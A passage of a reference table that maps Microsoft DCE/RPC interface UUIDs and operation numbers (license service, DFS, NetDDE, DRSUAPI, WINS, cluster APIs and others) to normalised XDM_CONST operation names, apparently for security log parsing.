342cfd40-3c6c-11ce-a893-08002b2e9c6d:52 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:53 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_PRODUCT_INFO_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:54 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:55 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_GET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:56 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:57 XDM_CONST.DCERPC_OPERATION_LLSR_SERVICE_INFO_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:58 XDM_CONST.DCERPC_OPERATION_LLSR_REPL_CONNECT

342cfd40-3c6c-11ce-a893-08002b2e9c6d:59 XDM_CONST.DCERPC_OPERATION_LLSR_REPL_CLOSE

342cfd40-3c6c-11ce-a893-08002b2e9c6d:60 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_REQUEST_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:61 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVER_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:62 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVER_SERVICE_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:63 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_SERVICE_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:64 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_USER_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:65 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:66 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_GET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:67 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:68 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_SECURITY_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:69 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSES_GET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:70 XDM_CONST.DCERPC_OPERATION_LLSR_PRODUCT_LICENSES_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:71 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:72 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:73 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_CHECK_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:74 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_CHECK_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:75 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:76 XDM_CONST.DCERPC_OPERATION_LLSR_CERTIFICATE_CLAIM_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:77 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_CERT_DB_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:78 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_PRODUCT_SECURITY_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:79 XDM_CONST.DCERPC_OPERATION_LLSR_REPLICATION_USER_ADD_EX_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:80 XDM_CONST.DCERPC_OPERATION_LLSR_CAPABILITY_GET

342cfd40-3c6c-11ce-a893-08002b2e9c6d:81 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ENUM_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:82 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ENUM_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:83 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ADD_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:84 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_ADD_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:85 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_SET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:86 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_SET_A

342cfd40-3c6c-11ce-a893-08002b2e9c6d:87 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_GET_W

342cfd40-3c6c-11ce-a893-08002b2e9c6d:88 XDM_CONST.DCERPC_OPERATION_LLSR_LOCAL_SERVICE_INFO_GET_A
 Original Mapped Description

342cfd40-3c6c-11ce-a893-08002b2e9c6d:89 XDM_CONST.DCERPC_OPERATION_LLSR_CLOSE_EX

91ae6020-9e3c-11cf-8d7c-00aa00c091be:0 XDM_CONST.DCERPC_OPERATION_CERT_SERVER_REQUEST

4fc742e0-4a10-11cf-8273-00aa004ae673:0 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_GET_VERSION

4fc742e0-4a10-11cf-8273-00aa004ae673:1 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD

4fc742e0-4a10-11cf-8273-00aa004ae673:2 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE

4fc742e0-4a10-11cf-8273-00aa004ae673:3 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_INFO

4fc742e0-4a10-11cf-8273-00aa004ae673:4 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_INFO

4fc742e0-4a10-11cf-8273-00aa004ae673:5 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ENUM

4fc742e0-4a10-11cf-8273-00aa004ae673:6 XDM_CONST.DCERPC_OPERATION_NETR_DFS_RENAME

4fc742e0-4a10-11cf-8273-00aa004ae673:7 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MOVE

4fc742e0-4a10-11cf-8273-00aa004ae673:8 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_GET_CONFIG_INFO

4fc742e0-4a10-11cf-8273-00aa004ae673:9 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_SEND_SITE_INFO

4fc742e0-4a10-11cf-8273-00aa004ae673:10 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_FT_ROOT

4fc742e0-4a10-11cf-8273-00aa004ae673:11 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE_FT_ROOT

4fc742e0-4a10-11cf-8273-00aa004ae673:12 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_STD_ROOT

4fc742e0-4a10-11cf-8273-00aa004ae673:13 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE_STD_ROOT

4fc742e0-4a10-11cf-8273-00aa004ae673:14 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_INITIALIZE

4fc742e0-4a10-11cf-8273-00aa004ae673:15 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD_STD_ROOT_FORCED

4fc742e0-4a10-11cf-8273-00aa004ae673:16 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_DC_ADDRESS

4fc742e0-4a10-11cf-8273-00aa004ae673:17 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_DC_ADDRESS

4fc742e0-4a10-11cf-8273-00aa004ae673:18 XDM_CONST.DCERPC_OPERATION_NETR_DFS_FLUSH_FT_TABLE

4fc742e0-4a10-11cf-8273-00aa004ae673:19 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ADD2

4fc742e0-4a10-11cf-8273-00aa004ae673:20 XDM_CONST.DCERPC_OPERATION_NETR_DFS_REMOVE2

4fc742e0-4a10-11cf-8273-00aa004ae673:21 XDM_CONST.DCERPC_OPERATION_NETR_DFS_ENUM_EX

4fc742e0-4a10-11cf-8273-00aa004ae673:22 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_INFO2

83da7c00-e84f-11d2-9807-00c04f8ec850:0 XDM_CONST.DCERPC_OPERATION_SFC_SRV_GET_NEXT_PROTECTED_FILE

83da7c00-e84f-11d2-9807-00c04f8ec850:1 XDM_CONST.DCERPC_OPERATION_SFC_SRV_IS_FILE_PROTECTED

83da7c00-e84f-11d2-9807-00c04f8ec850:2 XDM_CONST.DCERPC_OPERATION_SFC_SRV_FILE_EXCEPTION

83da7c00-e84f-11d2-9807-00c04f8ec850:3 XDM_CONST.DCERPC_OPERATION_SFC_SRV_INITIATE_SCAN

83da7c00-e84f-11d2-9807-00c04f8ec850:4 XDM_CONST.DCERPC_OPERATION_SFC_SRV_PURGE_CACHE

83da7c00-e84f-11d2-9807-00c04f8ec850:5 XDM_CONST.DCERPC_OPERATION_SFC_SRV_SET_CACHE_SIZE

83da7c00-e84f-11d2-9807-00c04f8ec850:6 XDM_CONST.DCERPC_OPERATION_SFC_SRV_SET_DISABLE

83da7c00-e84f-11d2-9807-00c04f8ec850:7 XDM_CONST.DCERPC_OPERATION_SFC_SRV_INSTALL_PROTECTED_FILES

2f5f3220-c126-1076-b549-074d078619da:0 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ADD_W

2f5f3220-c126-1076-b549-074d078619da:1 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_DEL_A

2f5f3220-c126-1076-b549-074d078619da:2 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_DEL_W

2f5f3220-c126-1076-b549-074d078619da:3 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_SHARE_SECURITY_A

2f5f3220-c126-1076-b549-074d078619da:4 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_SHARE_SECURITY_W

2f5f3220-c126-1076-b549-074d078619da:5 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_SHARE_SECURITY_A

2f5f3220-c126-1076-b549-074d078619da:6 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_SHARE_SECURITY_W

2f5f3220-c126-1076-b549-074d078619da:7 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ENUM_A
 Original Mapped Description

2f5f3220-c126-1076-b549-074d078619da:8 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_ENUM_W

2f5f3220-c126-1076-b549-074d078619da:9 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_GET_INFO_W

2f5f3220-c126-1076-b549-074d078619da:10 XDM_CONST.DCERPC_OPERATION_N_DDE_SHARE_SET_INFO_W

2f5f3220-c126-1076-b549-074d078619da:11 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_TRUSTED_SHARE_A

2f5f3220-c126-1076-b549-074d078619da:12 XDM_CONST.DCERPC_OPERATION_N_DDE_SET_TRUSTED_SHARE_W

2f5f3220-c126-1076-b549-074d078619da:13 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_TRUSTED_SHARE_A

2f5f3220-c126-1076-b549-074d078619da:14 XDM_CONST.DCERPC_OPERATION_N_DDE_GET_TRUSTED_SHARE_W

2f5f3220-c126-1076-b549-074d078619da:15 XDM_CONST.DCERPC_OPERATION_N_DDE_TRUSTED_SHARE_ENUM_A

2f5f3220-c126-1076-b549-074d078619da:16 XDM_CONST.DCERPC_OPERATION_N_DDE_TRUSTED_SHARE_ENUM_W

2f5f3220-c126-1076-b549-074d078619da:18 XDM_CONST.DCERPC_OPERATION_N_DDE_SPECIAL_COMMAND

3dde7c30-165d-11d1-ab8f-00805f14db40:0 XDM_CONST.DCERPC_OPERATION_BKRP_BACKUP_KEY

6bffd098-a112-3610-9833-46c3f87e345a:0 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_GET_INFO

6bffd098-a112-3610-9833-46c3f87e345a:1 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_SET_INFO

6bffd098-a112-3610-9833-46c3f87e345a:2 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_ENUM

6bffd098-a112-3610-9833-46c3f87e345a:3 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_GET_INFO

6bffd098-a112-3610-9833-46c3f87e345a:4 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_USER_SET_INFO

6bffd098-a112-3610-9833-46c3f87e345a:5 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_ENUM

6bffd098-a112-3610-9833-46c3f87e345a:6 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_ADD

6bffd098-a112-3610-9833-46c3f87e345a:7 XDM_CONST.DCERPC_OPERATION_NETR_WKSTA_TRANSPORT_DEL

6bffd098-a112-3610-9833-46c3f87e345a:8 XDM_CONST.DCERPC_OPERATION_NETR_USE_ADD

6bffd098-a112-3610-9833-46c3f87e345a:9 XDM_CONST.DCERPC_OPERATION_NETR_USE_GET_INFO

6bffd098-a112-3610-9833-46c3f87e345a:10 XDM_CONST.DCERPC_OPERATION_NETR_USE_DEL

6bffd098-a112-3610-9833-46c3f87e345a:11 XDM_CONST.DCERPC_OPERATION_NETR_USE_ENUM

6bffd098-a112-3610-9833-46c3f87e345a:12 XDM_CONST.DCERPC_OPERATION_NETR_MESSAGE_BUFFER_SEND

6bffd098-a112-3610-9833-46c3f87e345a:13 XDM_CONST.DCERPC_OPERATION_NETR_WORKSTATION_STATISTICS_GET

6bffd098-a112-3610-9833-46c3f87e345a:14 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_DOMAIN_NAME_ADD

6bffd098-a112-3610-9833-46c3f87e345a:15 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_DOMAIN_NAME_DEL

6bffd098-a112-3610-9833-46c3f87e345a:16 XDM_CONST.DCERPC_OPERATION_NETR_JOIN_DOMAIN

6bffd098-a112-3610-9833-46c3f87e345a:17 XDM_CONST.DCERPC_OPERATION_NETR_UNJOIN_DOMAIN

6bffd098-a112-3610-9833-46c3f87e345a:18 XDM_CONST.DCERPC_OPERATION_NETR_VALIDATE_NAME

6bffd098-a112-3610-9833-46c3f87e345a:19 XDM_CONST.DCERPC_OPERATION_NETR_RENAME_MACHINE_IN_DOMAIN

6bffd098-a112-3610-9833-46c3f87e345a:20 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOIN_INFORMATION

6bffd098-a112-3610-9833-46c3f87e345a:21 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOINABLE_O_US

6bffd098-a112-3610-9833-46c3f87e345a:22 XDM_CONST.DCERPC_OPERATION_NETR_JOIN_DOMAIN2

6bffd098-a112-3610-9833-46c3f87e345a:23 XDM_CONST.DCERPC_OPERATION_NETR_UNJOIN_DOMAIN2

6bffd098-a112-3610-9833-46c3f87e345a:24 XDM_CONST.DCERPC_OPERATION_NETR_RENAME_MACHINE_IN_DOMAIN2

6bffd098-a112-3610-9833-46c3f87e345a:25 XDM_CONST.DCERPC_OPERATION_NETR_VALIDATE_NAME2

6bffd098-a112-3610-9833-46c3f87e345a:26 XDM_CONST.DCERPC_OPERATION_NETR_GET_JOINABLE_O_US2

6bffd098-a112-3610-9833-46c3f87e345a:27 XDM_CONST.DCERPC_OPERATION_NETR_ADD_ALTERNATE_COMPUTER_NAME

6bffd098-a112-3610-9833-46c3f87e345a:28 XDM_CONST.DCERPC_OPERATION_NETR_REMOVE_ALTERNATE_COMPUTER_NAME

6bffd098-a112-3610-9833-46c3f87e345a:29 XDM_CONST.DCERPC_OPERATION_NETR_SET_PRIMARY_COMPUTER_NAME
 Original Mapped Description

6bffd098-a112-3610-9833-46c3f87e345a:30 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_COMPUTER_NAMES

6bffd098-a112-3610-9833-46c3f87e345a:31 XDM_CONST.DCERPC_OPERATION_NETR_WORKSTATION_RESET_DFS_CACHE

e1af8308-5d1f-11c9-91a4-08002b14a0fa:0 XDM_CONST.DCERPC_OPERATION_EPTINSERT

e1af8308-5d1f-11c9-91a4-08002b14a0fa:1 XDM_CONST.DCERPC_OPERATION_EPTDELETE

e1af8308-5d1f-11c9-91a4-08002b14a0fa:2 XDM_CONST.DCERPC_OPERATION_EPTLOOKUP

e1af8308-5d1f-11c9-91a4-08002b14a0fa:3 XDM_CONST.DCERPC_OPERATION_EPTMAP

e1af8308-5d1f-11c9-91a4-08002b14a0fa:4 XDM_CONST.DCERPC_OPERATION_EPTLOOKUPHANDLEFREE

e1af8308-5d1f-11c9-91a4-08002b14a0fa:5 XDM_CONST.DCERPC_OPERATION_EPTINQOBJECT

e1af8308-5d1f-11c9-91a4-08002b14a0fa:6 XDM_CONST.DCERPC_OPERATION_EPTMGMTDELETE

e1af8308-5d1f-11c9-91a4-08002b14a0fa:7 XDM_CONST.DCERPC_OPERATION_EPTMAPAUTH

e1af8308-5d1f-11c9-91a4-08002b14a0fa:8 XDM_CONST.DCERPC_OPERATION_EPTMAPAUTHASYNC

a4f1db00-ca47-1067-b31f-00dd010662da:0 XDM_CONST.DCERPC_OPERATION_EC_DO_CONNECT

a4f1db00-ca47-1067-b31f-00dd010662da:1 XDM_CONST.DCERPC_OPERATION_EC_DO_DISCONNECT

a4f1db00-ca47-1067-b31f-00dd010662da:2 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC

a4f1db00-ca47-1067-b31f-00dd010662da:3 XDM_CONST.DCERPC_OPERATION_EC_GET_MORE_RPC

a4f1db00-ca47-1067-b31f-00dd010662da:4 XDM_CONST.DCERPC_OPERATION_EC_R_REGISTER_PUSH_NOTIFICATION

a4f1db00-ca47-1067-b31f-00dd010662da:5 XDM_CONST.DCERPC_OPERATION_EC_R_UNREGISTER_PUSH_NOTIFICATION

a4f1db00-ca47-1067-b31f-00dd010662da:6 XDM_CONST.DCERPC_OPERATION_EC_DUMMY_RPC

a4f1db00-ca47-1067-b31f-00dd010662da:7 XDM_CONST.DCERPC_OPERATION_EC_R_GET_DC_NAME

a4f1db00-ca47-1067-b31f-00dd010662da:8 XDM_CONST.DCERPC_OPERATION_EC_R_NET_GET_DC_NAME

a4f1db00-ca47-1067-b31f-00dd010662da:9 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC_EXT

a4f1db00-ca47-1067-b31f-00dd010662da:10 XDM_CONST.DCERPC_OPERATION_EC_DO_CONNECT_EX

a4f1db00-ca47-1067-b31f-00dd010662da:11 XDM_CONST.DCERPC_OPERATION_EC_DO_RPC_EXT2

a4f1db00-ca47-1067-b31f-00dd010662da:12 XDM_CONST.DCERPC_OPERATION_EC_UNKNOWN0X_C

a4f1db00-ca47-1067-b31f-00dd010662da:13 XDM_CONST.DCERPC_OPERATION_EC_UNKNOWN0X_D

a4f1db00-ca47-1067-b31f-00dd010662da:14 XDM_CONST.DCERPC_OPERATION_EC_DO_ASYNC_CONNECT_EX

e3514235-4b06-11d1-ab04-00c04fc2dcd2:0 XDM_CONST.DCERPC_OPERATION_DRS_BIND

e3514235-4b06-11d1-ab04-00c04fc2dcd2:1 XDM_CONST.DCERPC_OPERATION_DRS_UNBIND

e3514235-4b06-11d1-ab04-00c04fc2dcd2:2 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_SYNC

e3514235-4b06-11d1-ab04-00c04fc2dcd2:3 XDM_CONST.DCERPC_OPERATION_DRS_GET_NC_CHANGES

e3514235-4b06-11d1-ab04-00c04fc2dcd2:4 XDM_CONST.DCERPC_OPERATION_DRS_UPDATE_REFS

e3514235-4b06-11d1-ab04-00c04fc2dcd2:5 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_ADD

e3514235-4b06-11d1-ab04-00c04fc2dcd2:6 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_DEL

e3514235-4b06-11d1-ab04-00c04fc2dcd2:7 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_MODIFY

e3514235-4b06-11d1-ab04-00c04fc2dcd2:8 XDM_CONST.DCERPC_OPERATION_DRS_VERIFY_NAMES

e3514235-4b06-11d1-ab04-00c04fc2dcd2:9 XDM_CONST.DCERPC_OPERATION_DRS_GET_MEMBERSHIPS

e3514235-4b06-11d1-ab04-00c04fc2dcd2:10 XDM_CONST.DCERPC_OPERATION_DRS_INTER_DOMAIN_MOVE

e3514235-4b06-11d1-ab04-00c04fc2dcd2:11 XDM_CONST.DCERPC_OPERATION_DRS_GET_NT4_CHANGE_LOG

e3514235-4b06-11d1-ab04-00c04fc2dcd2:12 XDM_CONST.DCERPC_OPERATION_DRS_CRACK_NAMES

e3514235-4b06-11d1-ab04-00c04fc2dcd2:13 XDM_CONST.DCERPC_OPERATION_DRS_WRITE_SPN

e3514235-4b06-11d1-ab04-00c04fc2dcd2:14 XDM_CONST.DCERPC_OPERATION_DRS_REMOVE_DS_SERVER
 Original Mapped Description

e3514235-4b06-11d1-ab04-00c04fc2dcd2:15 XDM_CONST.DCERPC_OPERATION_DRS_REMOVE_DS_DOMAIN

e3514235-4b06-11d1-ab04-00c04fc2dcd2:16 XDM_CONST.DCERPC_OPERATION_DRS_DOMAIN_CONTROLLER_INFO

e3514235-4b06-11d1-ab04-00c04fc2dcd2:17 XDM_CONST.DCERPC_OPERATION_DRS_ADD_ENTRY

e3514235-4b06-11d1-ab04-00c04fc2dcd2:18 XDM_CONST.DCERPC_OPERATION_DRS_EXECUTE_KCC

e3514235-4b06-11d1-ab04-00c04fc2dcd2:19 XDM_CONST.DCERPC_OPERATION_DRS_GET_REPL_INFO

e3514235-4b06-11d1-ab04-00c04fc2dcd2:20 XDM_CONST.DCERPC_OPERATION_DRS_ADD_SID_HISTORY

e3514235-4b06-11d1-ab04-00c04fc2dcd2:21 XDM_CONST.DCERPC_OPERATION_DRS_GET_MEMBERSHIPS2

e3514235-4b06-11d1-ab04-00c04fc2dcd2:22 XDM_CONST.DCERPC_OPERATION_DRS_REPLICA_VERIFY_OBJECTS

e3514235-4b06-11d1-ab04-00c04fc2dcd2:23 XDM_CONST.DCERPC_OPERATION_DRS_GET_OBJECT_EXISTENCE

e3514235-4b06-11d1-ab04-00c04fc2dcd2:24 XDM_CONST.DCERPC_OPERATION_DRS_QUERY_SITES_BY_COST

45f52c28-7f9f-101a-b52b-08002b2efabe:0 XDM_CONST.DCERPC_OPERATION_R_WINS_RECORD_ACTION

45f52c28-7f9f-101a-b52b-08002b2efabe:1 XDM_CONST.DCERPC_OPERATION_R_WINS_STATUS

45f52c28-7f9f-101a-b52b-08002b2efabe:2 XDM_CONST.DCERPC_OPERATION_R_WINS_TRIGGER

45f52c28-7f9f-101a-b52b-08002b2efabe:3 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_STATIC_INIT

45f52c28-7f9f-101a-b52b-08002b2efabe:4 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_SCAVENGING

45f52c28-7f9f-101a-b52b-08002b2efabe:5 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_DB_RECS

45f52c28-7f9f-101a-b52b-08002b2efabe:6 XDM_CONST.DCERPC_OPERATION_R_WINS_TERM

45f52c28-7f9f-101a-b52b-08002b2efabe:7 XDM_CONST.DCERPC_OPERATION_R_WINS_BACKUP

45f52c28-7f9f-101a-b52b-08002b2efabe:8 XDM_CONST.DCERPC_OPERATION_R_WINS_DEL_DB_RECS

45f52c28-7f9f-101a-b52b-08002b2efabe:9 XDM_CONST.DCERPC_OPERATION_R_WINS_PULL_RANGE

45f52c28-7f9f-101a-b52b-08002b2efabe:10 XDM_CONST.DCERPC_OPERATION_R_WINS_SET_PRIORITY_CLASS

45f52c28-7f9f-101a-b52b-08002b2efabe:11 XDM_CONST.DCERPC_OPERATION_R_WINS_RESET_COUNTERS

45f52c28-7f9f-101a-b52b-08002b2efabe:12 XDM_CONST.DCERPC_OPERATION_R_WINS_WORKER_THD_UPD

45f52c28-7f9f-101a-b52b-08002b2efabe:13 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_NAME_AND_ADD

45f52c28-7f9f-101a-b52b-08002b2efabe:14 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_BROWSER_NAMES_OLD

45f52c28-7f9f-101a-b52b-08002b2efabe:15 XDM_CONST.DCERPC_OPERATION_R_WINS_DELETE_WINS

45f52c28-7f9f-101a-b52b-08002b2efabe:16 XDM_CONST.DCERPC_OPERATION_R_WINS_SET_FLAGS

45f52c28-7f9f-101a-b52b-08002b2efabe:17 XDM_CONST.DCERPC_OPERATION_R_WINS_GET_DB_RECS_BY_NAME

45f52c28-7f9f-101a-b52b-08002b2efabe:18 XDM_CONST.DCERPC_OPERATION_R_WINS_STATUS_W_HDL

45f52c28-7f9f-101a-b52b-08002b2efabe:19 XDM_CONST.DCERPC_OPERATION_R_WINS_DO_SCAVENGING_NEW

afa8bd80-7d8a-11c9-bef4-08002b102989:0 XDM_CONST.DCERPC_OPERATION_INQIFIDS

afa8bd80-7d8a-11c9-bef4-08002b102989:1 XDM_CONST.DCERPC_OPERATION_INQSTATS

afa8bd80-7d8a-11c9-bef4-08002b102989:2 XDM_CONST.DCERPC_OPERATION_ISSERVERLISTENING

afa8bd80-7d8a-11c9-bef4-08002b102989:3 XDM_CONST.DCERPC_OPERATION_STOPSERVERLISTENING

afa8bd80-7d8a-11c9-bef4-08002b102989:4 XDM_CONST.DCERPC_OPERATION_INQPRINCNAME

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:0 XDM_CONST.DCERPC_OPERATION_AUTHZR_FREE_CONTEXT

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:1 XDM_CONST.DCERPC_OPERATION_AUTHZR_INITIALIZE_CONTEXT_FROM_SID

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:2 XDM_CONST.DCERPC_OPERATION_AUTHRZ_INITIALIZE_COMPOUND_CONTEXT

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:3 XDM_CONST.DCERPC_OPERATION_AUTHRZ_ACCESS_CHECK

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:4 XDM_CONST.DCERPC_OPERATION_AUTHRZ_GET_INFORMATION_FROM_CONTEXT

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:5 XDM_CONST.DCERPC_OPERATION_AUTHRZ_MODIFY_CLAIMS
 Original Mapped Description

0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7:6 XDM_CONST.DCERPC_OPERATION_AUTHRZ_MODIFY_SIDS

e3d0d746-d2af-40fd-8a7a-0d7078bb7092:0 XDM_CONST.DCERPC_OPERATION_EXCHANGE_PUBLIC_KEYS

b97db8b2-4c63-11cf-bff6-08002be23f2f:0 XDM_CONST.DCERPC_OPERATION_API_OPEN_CLUSTER

b97db8b2-4c63-11cf-bff6-08002be23f2f:1 XDM_CONST.DCERPC_OPERATION_API_CLOSE_CLUSTER

b97db8b2-4c63-11cf-bff6-08002be23f2f:2 XDM_CONST.DCERPC_OPERATION_API_SET_CLUSTER_NAME

b97db8b2-4c63-11cf-bff6-08002be23f2f:3 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_NAME

b97db8b2-4c63-11cf-bff6-08002be23f2f:4 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_VERSION

b97db8b2-4c63-11cf-bff6-08002be23f2f:5 XDM_CONST.DCERPC_OPERATION_API_GET_QUORUM_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:6 XDM_CONST.DCERPC_OPERATION_API_SET_QUORUM_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:7 XDM_CONST.DCERPC_OPERATION_API_CREATE_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:8 XDM_CONST.DCERPC_OPERATION_API_OPEN_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:9 XDM_CONST.DCERPC_OPERATION_API_CREATE_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:10 XDM_CONST.DCERPC_OPERATION_API_DELETE_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:11 XDM_CONST.DCERPC_OPERATION_API_CLOSE_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:12 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_STATE

b97db8b2-4c63-11cf-bff6-08002be23f2f:13 XDM_CONST.DCERPC_OPERATION_API_SET_RESOURCE_NAME

b97db8b2-4c63-11cf-bff6-08002be23f2f:14 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_ID

b97db8b2-4c63-11cf-bff6-08002be23f2f:15 XDM_CONST.DCERPC_OPERATION_API_GET_RESOURCE_TYPE

b97db8b2-4c63-11cf-bff6-08002be23f2f:16 XDM_CONST.DCERPC_OPERATION_API_FAIL_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:17 XDM_CONST.DCERPC_OPERATION_API_ONLINE_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:18 XDM_CONST.DCERPC_OPERATION_API_OFFLINE_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:19 XDM_CONST.DCERPC_OPERATION_API_ADD_RESOURCE_DEPENDENCY

